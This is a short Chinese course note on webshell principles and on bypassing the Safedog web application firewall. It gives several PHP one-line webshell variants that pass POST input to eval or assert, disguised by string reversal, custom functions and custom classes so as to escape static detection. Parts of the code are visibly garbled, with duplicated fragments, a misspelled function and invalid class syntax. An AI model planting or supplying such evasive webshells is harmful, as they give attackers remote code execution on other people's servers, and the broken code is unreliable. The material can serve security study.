Cyber Security-Day16(Webshell原理和Bypass安全狗)

一句话木马:

 

 绕过WAT的操作

静态文本查杀

1.文本查杀绕过：大小转换、文本跌倒、文本分割、干扰函数、加密、语言特征...

<?php a=array("TrE","sSa");a=array("TrE","sSa");a=array("TrE","sSa");a=a[0].a[0].a[0].a[1];b=strtolower(b=strtolower(b=strtolower(a);pring_r(c=strrev(c=strrev(c=strrev(b));echo(var_dump(c(c(c(_POST['key'])));?>

自定义函数

<?php

function getkey($a){

@eval($a);}

getkey($_POST['key']);

?>

自定义类

<?php

class getkey($a){

public function getkeys($a){

@eval($a);

}}

$key = new getkey;

key → getkeys(_POST['key']);

?>

2.动态查杀

加密传输，改变传输特征: